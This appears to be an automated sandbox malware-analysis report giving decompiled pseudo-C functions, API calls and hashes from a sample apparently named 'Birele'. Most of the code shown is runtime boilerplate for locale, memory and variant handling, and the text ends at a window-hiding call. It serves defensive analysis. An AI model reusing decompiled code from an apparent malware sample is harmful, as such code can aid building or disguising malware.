                                                                                                          • Instruction Fuzzy Hash: EDD05E6A30D260BAE210526B2DC5DBB5A9CCAC97A0F14457BFA48E7241D224CC0AA3B5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040B01C() {
                                                                                                          				struct _SYSTEMTIME* _t2;
                                                                                                          
                                                                                                          				GetLocalTime(_t2);
                                                                                                          				return _t2->wYear;
                                                                                                          			}




                                                                                                          0x0040b020
                                                                                                          0x0040b02c

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 481472006-0
                                                                                                          • Opcode ID: b20e7c9d5e9c48645a5c0da3b96c1700b113354ae64b7070f0cc6086f7b5f333
                                                                                                          • Instruction ID: 84afcb165929982d7b0753d5371d44f7b89c2bc9b48ea3d425a5c671a4e8af1a
                                                                                                          • Opcode Fuzzy Hash: b20e7c9d5e9c48645a5c0da3b96c1700b113354ae64b7070f0cc6086f7b5f333
                                                                                                          • Instruction Fuzzy Hash: A9A0120C404C0142C14033180C0315930449801620FD4075468BC213D1EA2D0120469B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040EE20() {
                                                                                                          				struct HINSTANCE__* _v8;
                                                                                                          				intOrPtr _t46;
                                                                                                          				void* _t91;
                                                                                                          
                                                                                                          				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                                                          				 *0x419a28 = E0040EDF4("VariantChangeTypeEx", E0040E990, _t91);
                                                                                                          				 *0x419a2c = E0040EDF4("VarNeg", E0040E9C0, _t91);
                                                                                                          				 *0x419a30 = E0040EDF4("VarNot", E0040E9C0, _t91);
                                                                                                          				 *0x419a34 = E0040EDF4("VarAdd", E0040E9CC, _t91);
                                                                                                          				 *0x419a38 = E0040EDF4("VarSub", E0040E9CC, _t91);
                                                                                                          				 *0x419a3c = E0040EDF4("VarMul", E0040E9CC, _t91);
                                                                                                          				 *0x419a40 = E0040EDF4("VarDiv", E0040E9CC, _t91);
                                                                                                          				 *0x419a44 = E0040EDF4("VarIdiv", E0040E9CC, _t91);
                                                                                                          				 *0x419a48 = E0040EDF4("VarMod", E0040E9CC, _t91);
                                                                                                          				 *0x419a4c = E0040EDF4("VarAnd", E0040E9CC, _t91);
                                                                                                          				 *0x419a50 = E0040EDF4("VarOr", E0040E9CC, _t91);
                                                                                                          				 *0x419a54 = E0040EDF4("VarXor", E0040E9CC, _t91);
                                                                                                          				 *0x419a58 = E0040EDF4("VarCmp", E0040E9D8, _t91);
                                                                                                          				 *0x419a5c = E0040EDF4("VarI4FromStr", E0040E9E4, _t91);
                                                                                                          				 *0x419a60 = E0040EDF4("VarR4FromStr", E0040EA50, _t91);
                                                                                                          				 *0x419a64 = E0040EDF4("VarR8FromStr", E0040EABC, _t91);
                                                                                                          				 *0x419a68 = E0040EDF4("VarDateFromStr", E0040EB28, _t91);
                                                                                                          				 *0x419a6c = E0040EDF4("VarCyFromStr", E0040EB94, _t91);
                                                                                                          				 *0x419a70 = E0040EDF4("VarBoolFromStr", E0040EC00, _t91);
                                                                                                          				 *0x419a74 = E0040EDF4("VarBstrFromCy", E0040EC80, _t91);
                                                                                                          				 *0x419a78 = E0040EDF4("VarBstrFromDate", E0040ECF0, _t91);
                                                                                                          				_t46 = E0040EDF4("VarBstrFromBool", E0040ED60, _t91);
                                                                                                          				 *0x419a7c = _t46;
                                                                                                          				return _t46;
                                                                                                          			}






                                                                                                          0x0040ee2e
                                                                                                          0x0040ee42
                                                                                                          0x0040ee58
                                                                                                          0x0040ee6e
                                                                                                          0x0040ee84
                                                                                                          0x0040ee9a
                                                                                                          0x0040eeb0
                                                                                                          0x0040eec6
                                                                                                          0x0040eedc
                                                                                                          0x0040eef2
                                                                                                          0x0040ef08
                                                                                                          0x0040ef1e
                                                                                                          0x0040ef34
                                                                                                          0x0040ef4a
                                                                                                          0x0040ef60
                                                                                                          0x0040ef76
                                                                                                          0x0040ef8c
                                                                                                          0x0040efa2
                                                                                                          0x0040efb8
                                                                                                          0x0040efce
                                                                                                          0x0040efe4
                                                                                                          0x0040effa
                                                                                                          0x0040f00a
                                                                                                          0x0040f010
                                                                                                          0x0040f017

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040EE29
                                                                                                            • Part of subcall function 0040EDF4: GetProcAddress.KERNEL32(00000000), ref: 0040EE0D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                          • Opcode ID: bdb40698b34ec6225ffea47ce212872b8a7fbbc49a5a346c06efc2bc322458bf
                                                                                                          • Instruction ID: 7de6bee41019896d0760bafea1200351b5f43c55b3df178a4c1e32df0fe6ca09
                                                                                                          • Opcode Fuzzy Hash: bdb40698b34ec6225ffea47ce212872b8a7fbbc49a5a346c06efc2bc322458bf
                                                                                                          • Instruction Fuzzy Hash: 984128B16042559BE314AB6FB80146777DADA44710364C83BF414FBEC2DF38AC699A2E
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E00401A3C() {
                                                                                                          				void* _t2;
                                                                                                          				void* _t3;
                                                                                                          				void* _t14;
                                                                                                          				intOrPtr* _t19;
                                                                                                          				intOrPtr _t23;
                                                                                                          				intOrPtr _t26;
                                                                                                          				intOrPtr _t28;
                                                                                                          
                                                                                                          				_t26 = _t28;
                                                                                                          				if( *0x4195bc == 0) {
                                                                                                          					return _t2;
                                                                                                          				} else {
                                                                                                          					_push(_t26);
                                                                                                          					_push(E00401B12);
                                                                                                          					_push( *[fs:edx]);
                                                                                                          					 *[fs:edx] = _t28;
                                                                                                          					if( *0x419045 != 0) {
                                                                                                          						_push(0x4195c4);
                                                                                                          						L004012D4();
                                                                                                          					}
                                                                                                          					 *0x4195bc = 0;
                                                                                                          					_t3 =  *0x41961c; // 0x611428
                                                                                                          					LocalFree(_t3);
                                                                                                          					 *0x41961c = 0;
                                                                                                          					_t19 =  *0x4195e4; // 0x612a5c
                                                                                                          					while(_t19 != 0x4195e4) {
                                                                                                          						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                                                          						_t19 =  *_t19;
                                                                                                          					}
                                                                                                          					E0040133C(0x4195e4);
                                                                                                          					E0040133C(0x4195f4);
                                                                                                          					E0040133C(0x419620);
                                                                                                          					_t14 =  *0x4195dc; // 0x612428
                                                                                                          					while(_t14 != 0) {
                                                                                                          						 *0x4195dc =  *_t14;
                                                                                                          						LocalFree(_t14);
                                                                                                          						_t14 =  *0x4195dc; // 0x612428
                                                                                                          					}
                                                                                                          					_pop(_t23);
                                                                                                          					 *[fs:eax] = _t23;
                                                                                                          					_push(0x401b19);
                                                                                                          					if( *0x419045 != 0) {
                                                                                                          						_push(0x4195c4);
                                                                                                          						L004012DC();
                                                                                                          					}
                                                                                                          					_push(0x4195c4);
                                                                                                          					L004012E4();
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          			}










                                                                                                          0x00401a3d
                                                                                                          0x00401a47
                                                                                                          0x00401b1b
                                                                                                          0x00401a4d
                                                                                                          0x00401a4f
                                                                                                          0x00401a50
                                                                                                          0x00401a55
                                                                                                          0x00401a58
                                                                                                          0x00401a62
                                                                                                          0x00401a64
                                                                                                          0x00401a69
                                                                                                          0x00401a69
                                                                                                          0x00401a6e
                                                                                                          0x00401a75
                                                                                                          0x00401a7b
                                                                                                          0x00401a82
                                                                                                          0x00401a87
                                                                                                          0x00401aa1
                                                                                                          0x00401a9a
                                                                                                          0x00401a9f
                                                                                                          0x00401a9f
                                                                                                          0x00401aae
                                                                                                          0x00401ab8
                                                                                                          0x00401ac2
                                                                                                          0x00401ac7
                                                                                                          0x00401ace
                                                                                                          0x00401ad2
                                                                                                          0x00401ad9
                                                                                                          0x00401ade
                                                                                                          0x00401ae3
                                                                                                          0x00401ae9
                                                                                                          0x00401aec
                                                                                                          0x00401aef
                                                                                                          0x00401afb
                                                                                                          0x00401afd
                                                                                                          0x00401b02
                                                                                                          0x00401b02
                                                                                                          0x00401b07
                                                                                                          0x00401b0c
                                                                                                          0x00401b11
                                                                                                          0x00401b11

                                                                                                          APIs
                                                                                                          • RtlEnterCriticalSection.NTDLL(004195C4), ref: 00401A69
                                                                                                          • LocalFree.KERNEL32(00611428,00000000,00401B12), ref: 00401A7B
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00611428,00000000,00401B12), ref: 00401A9A
                                                                                                          • LocalFree.KERNEL32(00612428,?,00000000,00008000,00611428,00000000,00401B12), ref: 00401AD9
                                                                                                          • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401B02
                                                                                                          • RtlDeleteCriticalSection.NTDLL(004195C4), ref: 00401B0C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                          • String ID: ($a$<*a$L*a$\*a
                                                                                                          • API String ID: 3782394904-1590182675
                                                                                                          • Opcode ID: f0f8f0773a141528fc38170044d0b10cc1ae6e33993730db78a405c4b141d76b
                                                                                                          • Instruction ID: 25698719bbe29fc3f7821338c9018e7429ddff27520ba8984f1b621353829f2e
                                                                                                          • Opcode Fuzzy Hash: f0f8f0773a141528fc38170044d0b10cc1ae6e33993730db78a405c4b141d76b
                                                                                                          • Instruction Fuzzy Hash: 2C114C75B046806EEB12AB66DCA1B967ADA9745B08F54807BE000B66F2C67D9C40CB2C
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 72%
                                                                                                          			E0040DBD0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                          				char _v8;
                                                                                                          				char _v12;
                                                                                                          				char _v16;
                                                                                                          				char _v20;
                                                                                                          				char _v24;
                                                                                                          				char _v28;
                                                                                                          				char _v32;
                                                                                                          				char _v36;
                                                                                                          				char _v40;
                                                                                                          				char _v44;
                                                                                                          				char _v48;
                                                                                                          				char _v52;
                                                                                                          				char _v56;
                                                                                                          				char _v60;
                                                                                                          				char _v64;
                                                                                                          				char _v68;
                                                                                                          				void* _t104;
                                                                                                          				void* _t111;
                                                                                                          				void* _t133;
                                                                                                          				intOrPtr _t183;
                                                                                                          				intOrPtr _t193;
                                                                                                          				intOrPtr _t194;
                                                                                                          
                                                                                                          				_t191 = __esi;
                                                                                                          				_t190 = __edi;
                                                                                                          				_t193 = _t194;
                                                                                                          				_t133 = 8;
                                                                                                          				do {
                                                                                                          					_push(0);
                                                                                                          					_push(0);
                                                                                                          					_t133 = _t133 - 1;
                                                                                                          				} while (_t133 != 0);
                                                                                                          				_push(__ebx);
                                                                                                          				_push(_t193);
                                                                                                          				_push(0x40de9b);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t194;
                                                                                                          				E0040DA5C();
                                                                                                          				E0040C5CC(__ebx, __edi, __esi);
                                                                                                          				_t196 =  *0x4199d4;
                                                                                                          				if( *0x4199d4 != 0) {
                                                                                                          					E0040C7A4(__esi, _t196);
                                                                                                          				}
                                                                                                          				_t132 = GetThreadLocale();
                                                                                                          				E0040C51C(_t43, 0, 0x14,  &_v20);
                                                                                                          				E00403A00(0x419908, _v20);
                                                                                                          				E0040C51C(_t43, 0x40deb0, 0x1b,  &_v24);
                                                                                                          				 *0x41990c = E00409A90(0x40deb0, 0, _t196);
                                                                                                          				E0040C51C(_t132, 0x40deb0, 0x1c,  &_v28);
                                                                                                          				 *0x41990d = E00409A90(0x40deb0, 0, _t196);
                                                                                                          				 *0x41990e = E0040C568(_t132, 0x2c, 0xf);
                                                                                                          				 *0x41990f = E0040C568(_t132, 0x2e, 0xe);
                                                                                                          				E0040C51C(_t132, 0x40deb0, 0x19,  &_v32);
                                                                                                          				 *0x419910 = E00409A90(0x40deb0, 0, _t196);
                                                                                                          				 *0x419911 = E0040C568(_t132, 0x2f, 0x1d);
                                                                                                          				E0040C51C(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                          				E0040C854(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                          				E00403A00(0x419914, _v36);
                                                                                                          				E0040C51C(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                          				E0040C854(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                          				E00403A00(0x419918, _v44);
                                                                                                          				 *0x41991c = E0040C568(_t132, 0x3a, 0x1e);
                                                                                                          				E0040C51C(_t132, 0x40dee4, 0x28,  &_v52);
                                                                                                          				E00403A00(0x419920, _v52);
                                                                                                          				E0040C51C(_t132, 0x40def0, 0x29,  &_v56);
                                                                                                          				E00403A00(0x419924, _v56);
                                                                                                          				E004039AC( &_v12);
                                                                                                          				E004039AC( &_v16);
                                                                                                          				E0040C51C(_t132, 0x40deb0, 0x25,  &_v60);
                                                                                                          				_t104 = E00409A90(0x40deb0, 0, _t196);
                                                                                                          				_t197 = _t104;
                                                                                                          				if(_t104 != 0) {
                                                                                                          					E00403A44( &_v8, 0x40df08);
                                                                                                          				} else {
                                                                                                          					E00403A44( &_v8, 0x40defc);
                                                                                                          				}
                                                                                                          				E0040C51C(_t132, 0x40deb0, 0x23,  &_v64);
                                                                                                          				_t111 = E00409A90(0x40deb0, 0, _t197);
                                                                                                          				_t198 = _t111;
                                                                                                          				if(_t111 == 0) {
                                                                                                          					E0040C51C(_t132, 0x40deb0, 0x1005,  &_v68);
                                                                                                          					if(E00409A90(0x40deb0, 0, _t198) != 0) {
                                                                                                          						E00403A44( &_v12, 0x40df24);
                                                                                                          					} else {
                                                                                                          						E00403A44( &_v16, 0x40df14);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_push(_v12);
                                                                                                          				_push(_v8);
                                                                                                          				_push(":mm");
                                                                                                          				_push(_v16);
                                                                                                          				E00403D08();
                                                                                                          				_push(_v12);
                                                                                                          				_push(_v8);
                                                                                                          				_push(":mm:ss");
                                                                                                          				_push(_v16);
                                                                                                          				E00403D08();
                                                                                                          				 *0x4199d6 = E0040C568(_t132, 0x2c, 0xc);
                                                                                                          				_pop(_t183);
                                                                                                          				 *[fs:eax] = _t183;
                                                                                                          				_push(E0040DEA2);
                                                                                                          				return E004039D0( &_v68, 0x10);
                                                                                                          			}

























                                                                                                          0x0040dbd0
                                                                                                          0x0040dbd0
                                                                                                          0x0040dbd1
                                                                                                          0x0040dbd3
                                                                                                          0x0040dbd8
                                                                                                          0x0040dbd8
                                                                                                          0x0040dbda
                                                                                                          0x0040dbdc
                                                                                                          0x0040dbdc
                                                                                                          0x0040dbdf
                                                                                                          0x0040dbe2
                                                                                                          0x0040dbe3
                                                                                                          0x0040dbe8
                                                                                                          0x0040dbeb
                                                                                                          0x0040dbee
                                                                                                          0x0040dbf3
                                                                                                          0x0040dbf8
                                                                                                          0x0040dbff
                                                                                                          0x0040dc01
                                                                                                          0x0040dc01
                                                                                                          0x0040dc0b
                                                                                                          0x0040dc1a
                                                                                                          0x0040dc27
                                                                                                          0x0040dc3c
                                                                                                          0x0040dc4b
                                                                                                          0x0040dc60
                                                                                                          0x0040dc6f
                                                                                                          0x0040dc82
                                                                                                          0x0040dc95
                                                                                                          0x0040dcaa
                                                                                                          0x0040dcb9
                                                                                                          0x0040dccc
                                                                                                          0x0040dce1
                                                                                                          0x0040dcec
                                                                                                          0x0040dcf9
                                                                                                          0x0040dd0e
                                                                                                          0x0040dd19
                                                                                                          0x0040dd26
                                                                                                          0x0040dd39
                                                                                                          0x0040dd4e
                                                                                                          0x0040dd5b
                                                                                                          0x0040dd70
                                                                                                          0x0040dd7d
                                                                                                          0x0040dd85
                                                                                                          0x0040dd8d
                                                                                                          0x0040dda2
                                                                                                          0x0040ddac
                                                                                                          0x0040ddb1
                                                                                                          0x0040ddb3
                                                                                                          0x0040ddcc
                                                                                                          0x0040ddb5
                                                                                                          0x0040ddbd
                                                                                                          0x0040ddbd
                                                                                                          0x0040dde1
                                                                                                          0x0040ddeb
                                                                                                          0x0040ddf0
                                                                                                          0x0040ddf2
                                                                                                          0x0040de04
                                                                                                          0x0040de15
                                                                                                          0x0040de2e
                                                                                                          0x0040de17
                                                                                                          0x0040de1f
                                                                                                          0x0040de1f
                                                                                                          0x0040de15
                                                                                                          0x0040de33
                                                                                                          0x0040de36
                                                                                                          0x0040de39
                                                                                                          0x0040de3e
                                                                                                          0x0040de4b
                                                                                                          0x0040de50
                                                                                                          0x0040de53
                                                                                                          0x0040de56
                                                                                                          0x0040de5b
                                                                                                          0x0040de68
                                                                                                          0x0040de7b
                                                                                                          0x0040de82
                                                                                                          0x0040de85
                                                                                                          0x0040de88
                                                                                                          0x0040de9a

                                                                                                          APIs
                                                                                                          • GetThreadLocale.KERNEL32(00000000,0040DE9B,?,?,00000000,00000000), ref: 0040DC06
                                                                                                            • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$InfoThread
                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                          • Opcode ID: 62902babc501b0eecbf65fad29318be35f1785e17a9f9c06512933d40bf4854a
                                                                                                          • Instruction ID: 5eb86ed3c9cb62c26540ef6b3a3db3d607a3633284b639398bbba6b49b036fa1
                                                                                                          • Opcode Fuzzy Hash: 62902babc501b0eecbf65fad29318be35f1785e17a9f9c06512933d40bf4854a
                                                                                                          • Instruction Fuzzy Hash: 37613F74B001499BDB00EBE5DC916DE76AA9B98304F14943BE101BB3C6CA3DED098B58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 77%
                                                                                                          			E0040FF8C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                          				char _v260;
                                                                                                          				char _v768;
                                                                                                          				char _v772;
                                                                                                          				short* _v776;
                                                                                                          				intOrPtr _v780;
                                                                                                          				char _v784;
                                                                                                          				signed int _v788;
                                                                                                          				signed short* _v792;
                                                                                                          				char _v796;
                                                                                                          				char _v800;
                                                                                                          				intOrPtr* _v804;
                                                                                                          				void* __ebp;
                                                                                                          				signed char _t47;
                                                                                                          				signed int _t54;
                                                                                                          				void* _t62;
                                                                                                          				intOrPtr* _t73;
                                                                                                          				intOrPtr* _t91;
                                                                                                          				void* _t93;
                                                                                                          				void* _t95;
                                                                                                          				void* _t98;
                                                                                                          				void* _t99;
                                                                                                          				intOrPtr* _t108;
                                                                                                          				void* _t112;
                                                                                                          				intOrPtr _t113;
                                                                                                          				char* _t114;
                                                                                                          				void* _t115;
                                                                                                          
                                                                                                          				_t100 = __ecx;
                                                                                                          				_v780 = __ecx;
                                                                                                          				_t91 = __edx;
                                                                                                          				_v776 = __eax;
                                                                                                          				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                          					E0040FBCC(0x80070057);
                                                                                                          				}
                                                                                                          				_t47 =  *_t91;
                                                                                                          				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                          					_push(_t91);
                                                                                                          					_push(_v776);
                                                                                                          					L0040E980();
                                                                                                          					return E0040FBCC(_v776);
                                                                                                          				} else {
                                                                                                          					if((_t47 & 0x00000040) == 0) {
                                                                                                          						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                                                                          					} else {
                                                                                                          						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                                                                          					}
                                                                                                          					_v788 =  *_v792 & 0x0000ffff;
                                                                                                          					_t93 = _v788 - 1;
                                                                                                          					if(_t93 < 0) {
                                                                                                          						L9:
                                                                                                          						_push( &_v772);
                                                                                                          						_t54 = _v788;
                                                                                                          						_push(_t54);
                                                                                                          						_push(0xc);
                                                                                                          						L0040EDD4();
                                                                                                          						_t113 = _t54;
                                                                                                          						if(_t113 == 0) {
                                                                                                          							E0040F924(_t100);
                                                                                                          						}
                                                                                                          						E0040FEE4(_v776);
                                                                                                          						 *_v776 = 0x200c;
                                                                                                          						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                          						_t95 = _v788 - 1;
                                                                                                          						if(_t95 < 0) {
                                                                                                          							L14:
                                                                                                          							_t97 = _v788 - 1;
                                                                                                          							if(E0040FF00(_v788 - 1, _t115) != 0) {
                                                                                                          								L0040EDEC();
                                                                                                          								E0040FBCC(_v792);
                                                                                                          								L0040EDEC();
                                                                                                          								E0040FBCC( &_v260);
                                                                                                          								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                          							}
                                                                                                          							_t62 = E0040FF30(_t97, _t115);
                                                                                                          						} else {
                                                                                                          							_t98 = _t95 + 1;
                                                                                                          							_t73 =  &_v768;
                                                                                                          							_t108 =  &_v260;
                                                                                                          							do {
                                                                                                          								 *_t108 =  *_t73;
                                                                                                          								_t108 = _t108 + 4;
                                                                                                          								_t73 = _t73 + 8;
                                                                                                          								_t98 = _t98 - 1;
                                                                                                          							} while (_t98 != 0);
                                                                                                          							do {
                                                                                                          								goto L14;
                                                                                                          							} while (_t62 != 0);
                                                                                                          							return _t62;
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						_t99 = _t93 + 1;
                                                                                                          						_t112 = 0;
                                                                                                          						_t114 =  &_v772;
                                                                                                          						do {
                                                                                                          							_v804 = _t114;
                                                                                                          							_push(_v804 + 4);
                                                                                                          							_t18 = _t112 + 1; // 0x1
                                                                                                          							_push(_v792);
                                                                                                          							L0040EDDC();
                                                                                                          							E0040FBCC(_v792);
                                                                                                          							_push( &_v784);
                                                                                                          							_t21 = _t112 + 1; // 0x1
                                                                                                          							_push(_v792);
                                                                                                          							L0040EDE4();
                                                                                                          							E0040FBCC(_v792);
                                                                                                          							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                          							_t112 = _t112 + 1;
                                                                                                          							_t114 = _t114 + 8;
                                                                                                          							_t99 = _t99 - 1;
                                                                                                          						} while (_t99 != 0);
                                                                                                          						goto L9;
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}





























                                                                                                          0x0040ff8c
                                                                                                          0x0040ff98
                                                                                                          0x0040ff9e
                                                                                                          0x0040ffa0
                                                                                                          0x0040ffaa
                                                                                                          0x0040ffb1
                                                                                                          0x0040ffb1
                                                                                                          0x0040ffb6
                                                                                                          0x0040ffc4
                                                                                                          0x0041013d
                                                                                                          0x00410144
                                                                                                          0x00410145
                                                                                                          0x00000000
                                                                                                          0x0040ffca
                                                                                                          0x0040ffcd
                                                                                                          0x0040ffdf
                                                                                                          0x0040ffcf
                                                                                                          0x0040ffd4
                                                                                                          0x0040ffd4
                                                                                                          0x0040ffee
                                                                                                          0x0040fffa
                                                                                                          0x0040fffd
                                                                                                          0x0041006a
                                                                                                          0x00410070
                                                                                                          0x00410071
                                                                                                          0x00410077
                                                                                                          0x00410078
                                                                                                          0x0041007a
                                                                                                          0x0041007f
                                                                                                          0x00410083
                                                                                                          0x00410085
                                                                                                          0x00410085
                                                                                                          0x00410090
                                                                                                          0x0041009b
                                                                                                          0x004100a6
                                                                                                          0x004100af
                                                                                                          0x004100b2
                                                                                                          0x004100ce
                                                                                                          0x004100d5
                                                                                                          0x004100e0
                                                                                                          0x004100f7
                                                                                                          0x004100fc
                                                                                                          0x00410110
                                                                                                          0x00410115
                                                                                                          0x00410128
                                                                                                          0x00410128
                                                                                                          0x00410131
                                                                                                          0x004100b4
                                                                                                          0x004100b4
                                                                                                          0x004100b5
                                                                                                          0x004100bb
                                                                                                          0x004100c1
                                                                                                          0x004100c3
                                                                                                          0x004100c5
                                                                                                          0x004100c8
                                                                                                          0x004100cb
                                                                                                          0x004100cb
                                                                                                          0x004100ce
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x004100ce
                                                                                                          0x0040ffff
                                                                                                          0x0040ffff
                                                                                                          0x00410000
                                                                                                          0x00410002
                                                                                                          0x00410008
                                                                                                          0x0041000a
                                                                                                          0x00410019
                                                                                                          0x0041001a
                                                                                                          0x00410024
                                                                                                          0x00410025
                                                                                                          0x0041002a
                                                                                                          0x00410035
                                                                                                          0x00410036
                                                                                                          0x00410040
                                                                                                          0x00410041
                                                                                                          0x00410046
                                                                                                          0x00410061
                                                                                                          0x00410063
                                                                                                          0x00410064
                                                                                                          0x00410067
                                                                                                          0x00410067
                                                                                                          0x00000000
                                                                                                          0x00410008
                                                                                                          0x0040fffd

                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410025
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410041
                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041007A
                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004100F7
                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410110
                                                                                                          • VariantCopy.OLEAUT32(?), ref: 00410145
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 351091851-3916222277
                                                                                                          • Opcode ID: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                                                                                          • Instruction ID: c325ab6cb83a6390ee565100a5bef1b57817c6d02eb9309406d7edb258310792
                                                                                                          • Opcode Fuzzy Hash: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                                                                                          • Instruction Fuzzy Hash: 36510F7590021A9BCB21DB59C891BD9B7BCAF0C304F0041FAF508E7252D678AFC58F69
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 65%
                                                                                                          			E004071E2(signed int __eax, void* __ecx) {
                                                                                                          				signed int _t27;
                                                                                                          				signed int _t39;
                                                                                                          				void* _t41;
                                                                                                          				void* _t44;
                                                                                                          				void* _t47;
                                                                                                          				signed int _t50;
                                                                                                          				signed int _t51;
                                                                                                          
                                                                                                          				_t39 = __eax;
                                                                                                          				_t41 = E00407CF4(__eax);
                                                                                                          				asm("jecxz 0x12");
                                                                                                          				_t50 = _t39 ^  *(_t41 + 0xf2);
                                                                                                          				_t51 = _t50;
                                                                                                          				if(_t51 == 0) {
                                                                                                          					 *(_t41 + 0xf2) = _t50;
                                                                                                          				}
                                                                                                          				asm("jecxz 0xa");
                                                                                                          				ShowWindow( *(_t39 + 0x1c), 0);
